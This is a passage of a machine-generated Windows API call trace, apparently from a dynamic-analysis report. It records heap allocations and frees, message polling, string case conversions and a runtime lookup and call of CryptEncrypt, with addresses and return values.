hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0265.476] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0265.476] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0265.476] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0265.476] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0265.476] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0265.476] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0265.476] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0265.476] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0265.476] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0265.476] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0265.476] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0265.476] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0265.477] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0265.477] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0265.477] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0265.477] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0265.477] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0265.477] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0265.477] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0265.477] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0265.477] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0265.477] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0265.477] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0265.477] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0265.477] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0265.477] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0265.477] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0265.477] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0265.477] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0265.477] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0265.477] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0265.478] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0265.478] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0265.478] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0265.478] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0265.478] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0265.478] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0265.478] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0265.478] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d920 [0265.478] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0265.478] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d920 | out: hHeap=0x25c0000) returned 1 [0265.478] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0265.478] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0265.478] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0265.478] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0265.478] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0265.478] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0265.478] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2090 [0265.478] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0265.479] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0265.479] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0265.479] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9c00 [0265.479] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0265.479] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0265.479] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2090 [0265.479] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20a0 [0265.479] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0265.479] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0265.479] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20b0 [0265.479] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20b0 | out: hHeap=0x25c0000) returned 1 [0265.479] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0265.479] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0265.479] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20b0 | out: hHeap=0x25c0000) returned 1 [0265.479] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0265.479] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0265.479] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0265.480] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0265.480] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0265.480] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0265.480] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d920 | out: hHeap=0x25c0000) returned 1 [0265.480] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0265.480] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20b0 | out: hHeap=0x25c0000) returned 1 [0265.480] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0265.480] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0265.480] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0265.480] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0265.480] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0265.480] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0265.480] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0265.480] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0265.480] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0265.480] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0265.481] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0265.481] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0265.481] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0265.481] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0265.481] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0265.481] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0265.481] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0265.481] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0265.481] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0265.481] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0265.481] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0265.481] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0265.481] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0265.482] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0265.482] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0265.482] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0265.482] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0265.482] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0265.482] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0265.482] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0265.482] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0265.482] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0265.482] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0265.482] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0265.482] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0265.482] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0265.482] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x3573ab0 | out: hHeap=0x25c0000) returned 1 [0265.484] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0265.485] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0265.485] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0265.485] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0265.485] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0265.485] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0265.485] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0265.485] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0265.485] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0265.485] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0265.485] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0265.485] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0265.486] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0265.487] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0265.487] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0265.487] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0265.487] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0265.487] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0265.487] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0265.487] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20b0 | out: hHeap=0x25c0000) returned 1 [0265.487] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0265.487] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0265.487] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0265.487] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20c0 | out: hHeap=0x25c0000) returned 1 [0265.487] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0265.487] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0265.487] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0265.488] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20d0 | out: hHeap=0x25c0000) returned 1 [0265.488] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0265.488] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0265.488] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0265.488] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20e0 | out: hHeap=0x25c0000) returned 1 [0265.488] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0265.488] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0265.488] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0265.488] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0265.488] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20f0 | out: hHeap=0x25c0000) returned 1 [0265.488] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0265.488] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0265.488] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0265.488] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2100 | out: hHeap=0x25c0000) returned 1 [0265.489] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0265.489] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0265.489] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0265.489] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2110 | out: hHeap=0x25c0000) returned 1 [0265.490] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0265.490] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x24aa1d0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0265.490] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0265.490] GetProcAddress (hModule=0x74d40000, lpProcName="CryptEncrypt") returned 0x74d6779b [0265.490] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0265.490] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2110 | out: hHeap=0x25c0000) returned 1 [0265.490] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1c) returned 0x24b6468 [0265.491] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2110 [0265.491] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a20a0 [0265.491] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2120 [0265.491] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2130 [0265.491] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2140 [0265.491] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2150 [0265.491] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2160 [0265.491] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2110 | out: hHeap=0x25c0000) returned 1 [0265.491] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0265.491] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2120 | out: hHeap=0x25c0000) returned 1 [0265.491] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2130 | out: hHeap=0x25c0000) returned 1 [0265.491] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2140 | out: hHeap=0x25c0000) returned 1 [0265.491] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2150 | out: hHeap=0x25c0000) returned 1 [0265.491] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2160 | out: hHeap=0x25c0000) returned 1 [0265.491] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0265.491] CryptEncrypt (in: hKey=0xaa5860, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8bef68*=0x2a8f, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8bef68*=0x2a90) returned 1 [0265.491] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0288 [0265.491] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0265.492] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2160 [0265.492] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0265.492] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0265.492] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0265.492] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2150 [0265.492] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0265.492] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2150 | out: hHeap=0x25c0000) returned 1 [0265.492] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0265.492] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0265.492] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0265.492] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0265.492] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2150 [0265.492] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0265.492] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2150 | out: hHeap=0x25c0000) returned 1 [0265.492] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0265.492] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0265.492] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0265.492] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0265.493] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2150 [0265.493] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0265.493] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2150 | out: hHeap=0x25c0000) returned 1 [0265.493] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0265.493] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0265.493] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0265.493] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0265.493] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2150 [0265.493] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0265.493] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2150 | out: hHeap=0x25c0000) returned 1 [0265.493] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0265.493] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0265.493] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0265.493] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0265.493] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2150 [0265.493] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0265.493] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2150 | out: hHeap=0x25c0000) returned 1 [0265.493] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0265.494] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0265.494] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0265.494] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0265.494] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2150 [0265.494] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0265.494] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2150 | out: hHeap=0x25c0000) returned 1 [0265.494] 